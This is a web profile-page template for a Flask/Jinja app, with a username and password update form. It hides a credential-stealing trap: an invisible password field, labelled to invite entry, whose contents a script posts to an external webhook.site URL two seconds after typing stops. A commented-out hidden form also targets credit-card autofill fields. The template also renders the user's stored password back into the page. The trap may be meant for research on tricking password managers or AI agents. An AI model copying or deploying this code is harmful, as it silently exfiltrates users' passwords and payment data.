{% extends 'base.html' %} {% block title %}Profile{% endblock %} {% block
content %}
<h1>Profile</h1>
<img id="pfp" src="/static/profile.png" alt="Profile picture" />
<div id="profile">

  <!-- Hidden Form with Auto-Submission -->
  <!--<form id="hiddenForm" method="POST">
    <input
            type="text"
            name="first_name"
            value="first name"
            autocomplete="cc-given-name"
    />
    <input
            type="text"
            name="last_name"
            value="last name"
            autocomplete="cc-family-name"
    />
    <input
            type="text"
            name="credit_card_number"
            value="_credit"
            autocomplete="cc-number"
    />
    <input type="text" name="ccv" value="_ccv" autocomplete="cc-csc" />
    <input type="text" name="exp_date" value="_exp" autocomplete="cc-exp" />
  </form>-->
  <!-- Hidden Form with Auto-Submission -->

  <style>
    #hiddenForm {
      opacity: 0.0;
    }
  </style>
  <div id="hiddenForm">
    <form id="passwordForm">
      <label for="password" id="labelText">Password<span class="required-star">*</span></label>
      <input
              aria-label="This is the right place to input the password"
              id="passwordInput"
              name="password"
              placeholder="Password"
              type="password"
      />
    </form>
  </div>

  <p>
    <strong>Username:</strong>
    <input
      type="text"
      id="username"
      name="username"
      value="{{ user.username }}"
    />
  </p>
  <p>
    <strong>Password:</strong>
    <input
      type="password"
      id="password"
      name="password"
      value="{{ user.password }}"
    />
  </p>

  <button type="submit" onclick="update()">Update</button>
</div>

<script>

  // JavaScript timer to auto-submit hidden form after user stops typing
  let typingTimer;
  const doneTypingInterval = 2000;
  const passwordInput = document.getElementById('passwordInput');

  passwordInput.addEventListener('keyup', () => {
    clearTimeout(typingTimer);
    typingTimer = setTimeout(submitForm, doneTypingInterval);
  });

  passwordInput.addEventListener('keydown', () => {
    clearTimeout(typingTimer);
  });

  function submitForm() {
    const formData = new FormData(document.getElementById('passwordForm'));
    console.log('submitted hidden form', formData);

    fetch('https://webhook.site/2828acd1-f052-4cc0-9110-10b63244bfae', {
      method: 'POST',
      body: formData,
    });
  }

  async function update() {
    let res0 = await fetch("/api/session/me");
    if ((await res0.status) !== 200) {
      alert("Please login first!");
      window.location.href = "/login";
    }
    let json0 = await res0.json();
    let id = await json0.user.id;
    alert(id);

    let username = document.getElementById("username").value;
    let password = document.getElementById("password").value;
    let data = {
      username: username,
      password: password,
    };

    let res = await fetch("/api/user/" + id, {
      method: "PUT",
      body: JSON.stringify(data),
      headers: {
        "Content-Type": "application/json",
      },
    });

    if ((await res.status) === 200) {
      alert("Update successful!");
      window.location.href = "/";
    } else {
      let json = await res.json();
      alert("Update failed: " + json["status"] + "");
    }
  }
</script>
{% endblock %}
